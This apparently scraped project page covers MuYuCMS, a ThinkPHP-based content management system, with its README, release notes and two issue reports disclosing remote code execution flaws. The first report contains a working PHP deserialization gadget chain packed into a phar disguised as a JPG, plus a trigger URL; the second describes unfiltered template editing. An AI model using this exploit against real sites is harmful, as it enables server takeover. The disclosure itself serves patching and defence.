MuYuCMS基于ThinkPHP5.1开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。

Related tags

CMS MuYuCMS
Overview

MuYuCMS

MuYuCMS MuYuCMS

[介绍]

MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。

[环境要求]

  • 支持系统:Windows/Linux/Mac
  • WEB服务器:Apache/Nginx/ISS
  • PHP版本:php >= 5.6 (推荐php5.6)
  • 数据库:MySQL >= 5.6 (推荐MySQL5.6)

[安装教程]

  • 将代码下载到网站的根目录
  • 运行安装文件 /install
  • 切忌不要放在子目录安装
  • 默认后台入口文件是 /admin.php

[开源协议]

MuYuCMS遵循Apache2开源协议发布,并提供免费使用。 部分代码来自互联网,若有异议,可以联系作者进行删除。

You might also like...
Comments
  • MuYuCMS v2.0 has RCE vulnerability

    MuYuCMS v2.0 has RCE vulnerability

    vulnerability in application/admin/controller/Update.php image

    we can upload phar files disguised as jpg in the background to further expand the attack surface. image

    POC:

    <?php
    namespace think{
        abstract class Model{
            protected $append;
            private $data;
            function __construct(){
                $this->append = ["aaaa"=>["123456"]];
                $this->data = ["aaaa"=>new Request()];
            }
        }
        class Request
        {
            protected $param;
            protected $hook;
            protected $filter;
            protected $config;
            function __construct(){
                $this->filter = "system";
                $this->config = ["var_ajax"=>''];
                $this->hook = ["visible"=>[$this,"isAjax"]];
                $this->param = ["calc"];
            }
        }
    }
    namespace think\process\pipes{
        use think\model\Pivot;
        class Windows
        {
            private $files;
    
            public function __construct()
            {
                $this->files=[new Pivot()];
            }
        }
    }
    namespace think\model{
        use think\Model;
        class Pivot extends Model
        {
        }
    }
    namespace{
        use think\process\pipes\Windows;
        @unlink('shell.jpg');
        $phar = new Phar("shell.phar"); //
        $phar->startBuffering();
        $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
        $object = new Windows();
        //$object ->haha= 'eval(@$_POST[\'a\']);';
        // $object ->haha= 'phpinfo();';
        $phar->setMetadata($object); 
        $phar->addFromString("a", "a"); //添加要压缩的文件
        
        $phar->stopBuffering();
        
        echo (base64_encode(serialize(new Windows())));
    
    }
    ?>
    

    change filename to 'shell.jpg' and upload image

    final: http://Youripaddress/admin.php/update/rmdirr?dirname=phar://./public/upload/menubg/613359e2251d3.jpg image

    opened by Aaisuiu 3
  • MuYuCMS v2.0 has RCE vulnerability

    MuYuCMS v2.0 has RCE vulnerability

    vulnerability in application/admin/controller/Template.php image In fact,here is no any filtering,You can edit what you want image After edit,the file will atuo saved in :template/,you can access it directly image

    opened by Aaisuiu 1
Releases(v2.2)
  • v2.2(Oct 5, 2021)

    😀UEditor更换至CKeditor 😁修复自定义单页问题 😂修复前后端内容XSS/SQL过滤 🤣修复标签库逻辑问题 😃修复在线更新问题 😄修复支付逻辑问题 😅修复模型新增下载地址后相关内容无法编辑问题 😆修复评论提交逻辑问题 😉修复栏目添加选择模型问题以及子栏目逻辑问题 😋完善授权用户实时更新状态 😎完善函数库函数 😍新增内容/评论/栏目非标签数据请求方法

    Source code(tar.gz)
    Source code(zip)
  • v2.1(Sep 4, 2021)

Owner
null